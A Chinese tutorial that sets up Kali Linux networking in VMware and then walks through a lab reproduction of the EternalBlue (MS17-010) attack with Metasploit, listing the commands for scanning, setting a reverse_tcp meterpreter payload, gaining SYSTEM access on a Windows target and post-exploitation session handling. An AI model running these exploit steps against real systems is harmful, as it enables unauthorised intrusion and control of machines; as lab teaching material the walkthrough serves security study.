kali虚拟机

  • kali网络配置

     虚拟网络编辑器配置

打开虚拟网络编辑器,用管理员权限打开

kali虚拟机_第1张图片

打开后

VMnet0采用桥接模式,外部连接这边选择自己桥接的对象

kali虚拟机_第2张图片

控制面板可查看桥接对象

kali虚拟机_第3张图片

 VMnet8这边选择NAT模式

kali虚拟机_第4张图片

VMnet1选择主机模式 

kali虚拟机_第5张图片

因为要用到两个网卡,

所以我们在虚拟机设置这边添加一个网络适配器,两个网络适配器都选择桥接模式,一样的配置

kali虚拟机_第6张图片

 如下图配置kali虚拟机_第7张图片

 一样的配置kali虚拟机_第8张图片

  • 物理机配置

用cmd界面的ipconfig命令

查看无线局域网适配器中的IPv4地址和子网掩码

无线局域网适配器 WLAN中的IPv4和默认网关

kali虚拟机_第9张图片

  • kali配置

kali的终端下输入命令以停止网络服务

systemctl stop NetworkManager

service NetworkManager stop

然后输入vim /etc/network/interfaces

kali虚拟机_第10张图片

从物理机得到的信息,只需要更改数字即可

物理机(eth1)和wifi(eth0)netmask一般都是255.255.255.0,可以不用更改

物理机(eth1)的address和gateway一样

其余对比物理机信息替换即可

按i进入编辑模式

kali虚拟机_第11张图片

 输入:wq! 强制保存文件并退出

输入

vim /etc/resolv.conf

kali虚拟机_第12张图片

输入

ip addr

kali虚拟机_第13张图片

出现down,输入

ip link set eth1 up

参数填写down的网卡,这边是eth1,再查看一下网卡

最后

重启网络服务

systemctl restart networking

service NetworkManager start

能ping得通外网,即代表成功

kali虚拟机_第14张图片

  • 永恒之蓝漏洞

基础命令

#进入msf:                
msfconsole
#使用search查找相关漏洞:  
search  ms17-010
#使用use进入模块:              
use 数字  
#使用info查看模块信息:         
info
#设置poc连接方式:            
set payload windows/x64/meterpreter/reverse_tcp
#查看模块需要配置的参数:    
show options
#设置参数:                
set  RHOST  192.168.125.138
#攻击:                    
exploit / run
#回退
back

后渗透命令

#查看当前用户
getuid
#进入shell
shell
#解决shell乱码
chcp 65001
#退出shell
exit
#把会话放到后台
background
#查看所有会话
sessions
#进入某个会话
sessions -i id号
#删除会话
sessions -k id号

 在复现前需要准备

攻击机   kali   192.168.126.203

靶机      win11   192.168.126.160

在靶机里面关闭防火墙

  • 主机发现

nmap 靶机ip -O -sS -T4
#-O 操作系统识别

kali虚拟机_第15张图片

 发现主机开的是80端口,并且操作系统可能是win10

  • 永恒之蓝漏洞探测

先进入msf,然后搜寻ms17-010的漏洞模块

msfconsole
#搜寻模块
search ms17-010
#使用模块
use 3

 使用scanner模块对主机进行扫描,检测是否存在漏洞,使用use 3

kali虚拟机_第16张图片

kali虚拟机_第17张图片

 进入到该模块之后,可以使用info查看该漏洞模块的具体介绍信息kali虚拟机_第18张图片

 使用show options选项,查看我们要输入的具体参数,其中标注了yes的选项是必须的参数,若这个参数为空,则需要我们填写。RHOSTS选项为空,所以我们需要填写,RHOSTS代表要攻击的目标。输入r然后按tab键可以自动补全该参数

kali虚拟机_第19张图片

 执行扫描攻击

显示主机很可能能够会受到永恒之蓝漏洞的攻击

kali虚拟机_第20张图片

  • 漏洞攻击

search 17-010
use 0
#设置payload连接的方式,reverse_tcp为反向连接,即受害机主动连接攻击机,以获取shell
set payload windows/x64/meterpreter/reverse_tcp
show options
set rhosts 192.168.125.130

 执行命令

search 17-010

kali虚拟机_第21张图片

 执行攻击,返回一个meterpreter 会话,通过该会话可以控制目标主机,成功拿下主机system权限

kali虚拟机_第22张图片

 拿到主机权限后,可以进入该主机的shell(cmd),执行cmd命令

#进入dos命令行
shell
#切换编码,解决乱码问题
chcp 65001
ipconfig

可以退出当前shell,然后把该会话放到msf后台

 exit
background

你可能感兴趣的:(kafka)